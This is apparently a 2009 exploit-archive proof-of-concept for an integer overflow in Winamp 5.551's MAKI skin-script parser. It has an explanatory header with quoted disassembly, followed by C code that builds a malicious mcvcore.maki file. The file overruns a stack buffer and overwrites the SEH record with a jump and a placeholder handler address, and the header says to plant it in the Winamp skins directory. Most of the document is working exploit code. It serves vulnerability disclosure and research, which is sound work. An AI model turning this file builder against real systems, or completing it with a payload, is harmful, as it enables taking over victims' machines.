/*
|
|
Winamp 5.551 MAKI Parsing Integer Overflow Vulnerability
|
|
|
|
This is a simple proof-of-concept (PoC) that shows how to trigger the recent MAKI file parsing vulnerability: a 16-bit string length is sign-extended and handed to memmove() as its size, so a length of 0x8000 or more turns into a huge copy into a fixed-size stack buffer.
|
|
|
|
Tested on: Windows Vista SP1 and Windows XP SP3
|
|
Release Date: May 22 2009
|
|
Vendor's web site: http://www.winamp.com/
|
|
Version tested: Winamp 5.551
|
|
Not vulnerable: Winamp 5.552 (the patched release)
|
|
|
|
I am not going into any real detail, as this is just PoC code and the author of the article linked below already explains where and why the overflow happens. If you are interested, look through the DLL yourself and you will also see the vulnerable memmove() call :).
|
|
|
|
Credits to the guys down at vrt-sourcefire for the overflow.
|
|
http://vrt-sourcefire.blogspot.com
|
|
|
|
The overflow lets us overwrite the structured exception handler (SEH) record on the stack and thereby take control of the application. The vendor has released a patch (5.552), but older versions are still vulnerable. Note that this PoC only demonstrates the SEH overwrite: the handler address it writes (0x42424242) is a placeholder, so the visible result is a crash at that address, not code execution.
|
|
|
|
Below is an explanation of the overflow, taken from the web site at the URL above.
|
|
|
|
|
|
[--Snip--]
|
|
.text:12094DAB var_10144= byte ptr -10144h
|
|
.text:12094DAB MultiByteStr= byte ptr -13ch
|
|
|
|
If a string size is greater than or equal to 0x8000, edi will be 0xFFFFhhhh (where 0xhhhh is the two-byte input): movsx sign-extends the 16-bit length, and the resulting negative value is then pushed as memmove()'s Size argument, where it is interpreted as a huge unsigned count, so the copy runs far past the fixed-size stack buffer.
|
|
|
|
.text:12094F62 loc_12094F62:
|
|
.text:12094F62 mov ax, [ebx]
|
|
.text:12094F65 movsx edi, ax ; sign extension
|
|
.text:12094F68 inc ebx
|
|
.text:12094F69 push edi ; Size
|
|
.text:12094F6A inc ebx
|
|
.text:12094F6B lea eax, [ebp+MultiByteStr]
|
|
.text:12094F71 push ebx ; Src
|
|
.text:12094F72 push eax ; Dst, buffer is located in the stack
|
|
.text:12094F73 call memmove
|
|
|
|
.text:120951E5 loc_120951E5:
|
|
.text:120951E5 mov edi, [ebx]
|
|
.text:120951E7 add ebx, 4
|
|
.text:120951EA mov ax, [ebx]
|
|
.text:120951ED movsx esi, ax ; sign extension
|
|
.text:120951F0 inc ebx
|
|
.text:120951F1 push esi ; Size
|
|
.text:120951F2 inc ebx
|
|
.text:120951F3 lea eax, [ebp+var_10144]
|
|
.text:120951F9 push ebx ; Src
|
|
.text:120951FA push eax ; Dst, buffer is located in the stack
|
|
.text:120951FB call memmove
|
|
[--Snip--]
|
|
|
|
Once the file has been created, place the generated mcvcore.maki inside the Winamp/Skins/Bento/Scripts/ directory of the Winamp installation (back up the original file first, since it gets replaced). Then start Winamp under OllyDbg and step through the execution. Do this only on an isolated test machine or VM running the vulnerable 5.551 build.
|
|
|
|
Credits to n00b for writing simple poc code !!
|
|
Progression is always a good thing.
|
|
----------
|
|
Disclaimer
|
|
----------
|
|
The information in this advisory and any of its
|
|
demonstrations is provided "as is" without any
|
|
warranty of any kind.
|
|
|
|
I am not liable for any direct or indirect damages
|
|
caused as a result of using the information or
|
|
demonstrations provided in any part of this advisory.
|
|
Educational use only..!!
|
|
*/
|
|
|
|
|
|
#include <stdio.h>
|
|
#define MAKI "mcvcore.maki"
|
|
|
|
|
|
/*
 * Leading bytes of the crafted mcvcore.maki; main() writes them verbatim.
 *
 * Only the first two bytes are obviously meaningful from here: 'F','G'
 * (0x46 0x47), presumably the MAKI file magic.  The rest (the following
 * words and the 16-byte GUID-like runs) was lifted from a real compiled
 * script and is NOT decoded in this PoC -- treat it as an opaque prefix
 * needed to reach the vulnerable string-parsing path.  The trailing 0x00
 * is part of the array and is written to the file as well, because
 * main() loops over sizeof(First_Header) (688 bytes).
 */
unsigned char First_Header[] =
{
0x46, 0x47, 0x03, 0x04, 0x17, 0x00, 0x00, 0x00, 0x2A, 0x00, 0x00, 0x00,
0x71, 0x49, 0x65, 0x51, 0x87, 0x0D, 0x51, 0x4A, 0x91, 0xE3, 0xA6, 0xB5,
0x32, 0x35, 0xF3, 0xE7, 0x64, 0x0F, 0xF5, 0xD6, 0xFA, 0x93, 0xB7, 0x49,
0x93, 0xF1, 0xBA, 0x66, 0xEF, 0xAE, 0x3E, 0x98, 0x7B, 0xC4, 0x0D, 0xE9,
0x0D, 0x84, 0xE7, 0x4A, 0xB0, 0x2C, 0x04, 0x0B, 0xD2, 0x75, 0xF7, 0xFC,
0xB5, 0x3A, 0x02, 0xB2, 0x4D, 0x43, 0xA1, 0x4B, 0xBE, 0xAE, 0x59, 0x63,
0x75, 0x03, 0xF3, 0xC6, 0x78, 0x57, 0xC6, 0x87, 0x43, 0xE7, 0xFE, 0x49,
0x85, 0xF9, 0x09, 0xCC, 0x53, 0x2A, 0xFD, 0x56, 0x65, 0x36, 0x60, 0x38,
0x1B, 0x46, 0xA7, 0x42, 0xAA, 0x75, 0xD8, 0x3F, 0x66, 0x67, 0xBF, 0x73,
0xF4, 0x7A, 0x78, 0xF4, 0xBB, 0xB2, 0xF7, 0x4E, 0x9C, 0xFB, 0xE7, 0x4B,
0xA9, 0xBE, 0xA8, 0x8D, 0x02, 0x0C, 0x37, 0x3A, 0xBF, 0x3C, 0x9F, 0x43,
0x84, 0xF1, 0x86, 0x88, 0x5B, 0xCF, 0x1E, 0x36, 0xB6, 0x5B, 0x0C, 0x5D,
0xE1, 0x7D, 0x1F, 0x4B, 0xA7, 0x0F, 0x8D, 0x16, 0x59, 0x94, 0x19, 0x41,
0x99, 0xE1, 0xE3, 0x4E, 0x36, 0xC6, 0xEC, 0x4B, 0x97, 0xCD, 0x78, 0xBC,
0x9C, 0x86, 0x28, 0xB0, 0xE5, 0x95, 0xBE, 0x45, 0x72, 0x20, 0x91, 0x41,
0x93, 0x5C, 0xBB, 0x5F, 0xF9, 0xF1, 0x17, 0xFD, 0x4E, 0x6D, 0x90, 0x60,
0x7E, 0x53, 0x2E, 0x48, 0xB0, 0x04, 0xCC, 0x94, 0x61, 0x88, 0x56, 0x72,
0xC0, 0xBC, 0x3A, 0x40, 0x22, 0x6F, 0xD6, 0x4B, 0x8B, 0xA4, 0x10, 0xC8,
0x29, 0x93, 0x25, 0x47, 0x4D, 0x3E, 0xAA, 0x97, 0xD0, 0xF4, 0xA8, 0x4F,
0x81, 0x7B, 0x0D, 0x0A, 0xF2, 0x2A, 0x45, 0x49, 0x83, 0xFA, 0xBB, 0xE4,
0x64, 0xF4, 0x81, 0xD9, 0x49, 0xB0, 0xC0, 0xA8, 0x5B, 0x2E, 0xC3, 0xBC,
0xFD, 0x3F, 0x5E, 0xB6, 0x62, 0x5E, 0x37, 0x8D, 0x40, 0x8D, 0xEA, 0x76,
0x81, 0x4A, 0xB9, 0x1B, 0x77, 0xBE, 0x97, 0x4F, 0xCE, 0xB0, 0x77, 0x19,
0x4E, 0x99, 0x56, 0xD4, 0x98, 0x33, 0xC9, 0x6C, 0x27, 0x0D, 0x20, 0xC2,
0xA8, 0xEB, 0x51, 0x2A, 0x4B, 0xBA, 0x7F, 0x5D, 0x4B, 0xC6, 0x5D, 0x4C,
0x71, 0x38, 0xBA, 0x1E, 0x8D, 0x9E, 0x48, 0x3E, 0x48, 0xB9, 0x60, 0x8D,
0x1F, 0x43, 0xC5, 0xC4, 0x05, 0x40, 0xC9, 0x08, 0x0F, 0x39, 0xAF, 0x23,
0x4B, 0x80, 0xF3, 0xB8, 0xC4, 0x8F, 0x7E, 0xBB, 0x59, 0x72, 0x86, 0xAA,
0xEF, 0x0E, 0x31, 0xFA, 0x41, 0xB7, 0xDC, 0x85, 0xA9, 0x52, 0x5B, 0xCB,
0x4B, 0x44, 0x32, 0xFD, 0x7D, 0x51, 0x37, 0x7C, 0x4E, 0xBF, 0x40, 0x82,
0xAE, 0x5F, 0x3A, 0xDC, 0x33, 0x15, 0xFA, 0xB9, 0x5A, 0x7D, 0x9A, 0x57,
0x45, 0xAB, 0xC8, 0x65, 0x57, 0xA6, 0xC6, 0x7C, 0xA9, 0xCD, 0xDD, 0x8E,
0x69, 0x1E, 0x8F, 0xEC, 0x4F, 0x9B, 0x12, 0xF9, 0x44, 0xF9, 0x09, 0xFF,
0x45, 0x27, 0xCD, 0x64, 0x6B, 0x26, 0x5A, 0x4B, 0x4C, 0x8C, 0x59, 0xE6,
0xA7, 0x0C, 0xF6, 0x49, 0x3A, 0xE4, 0x05, 0xCB, 0x6D, 0xC4, 0x8A, 0xC2,
0x48, 0xB1, 0x93, 0x49, 0xF0, 0x91, 0x0E, 0xF5, 0x4A, 0xFF, 0xCF, 0xDC,
0xB4, 0xFE, 0x81, 0xCC, 0x4B, 0x96, 0x1B, 0x72, 0x0F, 0xD5, 0xBE, 0x0F,
0xFF, 0xE1, 0x8C, 0xE2, 0x01, 0x59, 0xB0, 0xD5, 0x11, 0x97, 0x9F, 0xE4,
0xDE, 0x6F, 0x51, 0x76, 0x0D, 0x0A, 0xBD, 0xF8, 0xF0, 0x80, 0xA5, 0x1B,
0xA6, 0x42, 0xA0, 0x93, 0x32, 0x36, 0xA0, 0x0C, 0x8D, 0x4A, 0x1B, 0x34,
0x2E, 0x9B, 0x98, 0x6C, 0xFA, 0x40, 0x8B, 0x85, 0x0C, 0x1B, 0x6E, 0xE8,
0x94, 0x05, 0x71, 0x9B, 0xD5, 0x36, 0xFD, 0x03, 0xF8, 0x4A, 0x97, 0x95,
0x05, 0x02, 0xB7, 0xDB, 0x26, 0x7A, 0x10, 0xF2, 0xD5, 0x7F, 0xC4, 0xAC,
0xDF, 0x48, 0xA6, 0xA0, 0x54, 0x51, 0x57, 0x6C, 0xDC, 0x76, 0x35, 0xA5,
0xBA, 0xB5, 0xB3, 0x05, 0xCB, 0x4D, 0xAD, 0xC1, 0xE6, 0x18, 0xD2, 0x8F,
0x68, 0x96, 0xC1, 0xFE, 0x29, 0x61, 0xB7, 0xDA, 0x51, 0x4D, 0x91, 0x65,
0x01, 0xCA, 0x0C, 0x1B, 0x70, 0xDB, 0xF7, 0x14, 0x95, 0xD5, 0x36, 0xED,
0xE8, 0x45, 0x98, 0x0F, 0x3F, 0x4E, 0xA0, 0x52, 0x2C, 0xD9, 0x82, 0x4B,
0x3B, 0x9B, 0x7A, 0x66, 0x0E, 0x42, 0x8F, 0xFC, 0x79, 0x41, 0x15, 0x80,
0x9C, 0x02, 0x99, 0x31, 0xED, 0xC7, 0x19, 0x53, 0x98, 0x47, 0x98, 0x63,
0x60, 0xB1, 0x5A, 0x29, 0x8C, 0xAA, 0x4D, 0xC1, 0xBB, 0xE2, 0xF6, 0x84,
0x73, 0x41, 0xBD, 0xB3, 0xB2, 0xEB, 0x2F, 0x66, 0x55, 0x50, 0x94, 0x05,
0xC0, 0x73, 0x1F, 0x96, 0x1B, 0x40, 0x9B, 0x1B, 0x67, 0x24, 0x27, 0xAC,
0x41, 0x65, 0x22, 0xBA, 0x3D, 0x59, 0x77, 0xD0, 0x76, 0x49, 0xB9, 0x52,
0xF4, 0x71, 0x36, 0x55, 0x40, 0x0B, 0x82, 0x02, 0x03, 0xD4, 0xAB, 0x3A,
0x87, 0x4D, 0x87, 0x8D, 0x12, 0x32, 0x6F, 0xAD, 0xFC, 0xD5, 0x83, 0xC2,
0xDE, 0x24, 0x6E, 0xB7, 0x36, 0x4A, 0x8C, 0xCC, 0x9E, 0x24, 0xC4, 0x6B,
0x6C, 0x73, 0x37, 0x00
};
|
|
|
|
/*
 * Bytes that follow First_Header and trigger the overflow.
 *
 * The parser reads a 16-bit string length and sign-extends it (movsx)
 * before passing it to memmove(); 0xFFFF therefore becomes -1, which
 * memmove() treats as an enormous unsigned size, so the copy runs far
 * past the fixed-size stack buffer.  The eleven 0xFF bytes presumably
 * cover the 4-byte word and the 2-byte length read at loc_120951E5 plus
 * the start of the copied data -- the count was taken from the original
 * PoC and is not derived here; confirm against the disassembly.
 */
unsigned char Exception [] =
{
    0xFF, 0xFF, 0xFF, 0xFF,
    0xFF, 0xFF, 0xFF, 0xFF,
    0xFF, 0xFF, 0xFF
};
|
|
|
|
|
|
|
|
|
|
/* Filler byte repeated between the trigger bytes and the fake SEH record. */
unsigned char Junk1 = 0x41; /* 'A' */
|
|
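/*
 * Number of filler bytes written between the trigger bytes and the fake
 * SEH record.  Taken from the original PoC; presumably chosen so that the
 * 8-byte record that follows lands on the exception registration record
 * when the oversized memmove() runs off the stack buffer -- confirm under
 * the debugger.
 */
enum { FILLER_LEN = 16751 };

/*
 * Write exactly `len` bytes of `buf` to `fp`.
 * Returns 0 on success, -1 if fwrite() reports a short write.
 */
static int write_bytes(FILE *fp, const void *buf, size_t len)
{
    return fwrite(buf, 1, len, fp) == len ? 0 : -1;
}

/*
 * Write the filler byte Junk1 `count` times, checking every write.
 * Returns 0 on success, -1 on the first failed fputc().
 */
static int write_filler(FILE *fp, size_t count)
{
    size_t n;

    for (n = 0; n < count; n++) {
        if (fputc(Junk1, fp) == EOF)
            return -1;
    }
    return 0;
}

/*
 * Build mcvcore.maki in the current directory with this layout:
 *
 *   First_Header   sizeof(First_Header) bytes, including its trailing 0x00
 *   Exception      11 x 0xFF (the oversized string length)
 *   FILLER_LEN     bytes of Junk1
 *   next SEH       EB 06 90 90   (short jmp +6, skipping the handler slot)
 *   SE handler     42 42 42 42   (placeholder: NOT a pop/pop/ret address;
 *                                 the process faults at 0x42424242, so this
 *                                 only demonstrates handler control)
 *
 * Returns 0 on success and 1 if the file could not be created or fully
 * written.  The previous version returned 0 on fopen() failure and never
 * checked fputc/fputs/fclose, so a short or failed write produced a
 * truncated file with a success exit status.  The SEH record bytes are
 * now written from explicit arrays with fwrite() rather than string
 * literals with fputs(), so their length does not depend on the absence
 * of an embedded NUL.
 */
int main(void)
{
    static const unsigned char next_seh[4]   = { 0xEB, 0x06, 0x90, 0x90 };
    static const unsigned char se_handler[4] = { 0x42, 0x42, 0x42, 0x42 };
    FILE *fp;
    int rc = 1;

    fp = fopen(MAKI, "wb");
    if (fp == NULL) {
        printf("File %s write error\n", MAKI);
        return 1;
    }

    if (write_bytes(fp, First_Header, sizeof(First_Header)) != 0 ||
        write_bytes(fp, Exception, sizeof(Exception)) != 0 ||
        write_filler(fp, FILLER_LEN) != 0 ||
        write_bytes(fp, next_seh, sizeof(next_seh)) != 0 ||
        write_bytes(fp, se_handler, sizeof(se_handler)) != 0) {
        printf("File %s write error\n", MAKI);
    } else {
        rc = 0;
    }

    /* fclose() flushes the stdio buffer; a failure here is a write failure too. */
    if (fclose(fp) != 0) {
        printf("File %s write error\n", MAKI);
        rc = 1;
    }

    return rc;
}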
|
|
|
|
// milw0rm.com [2009-05-22]
|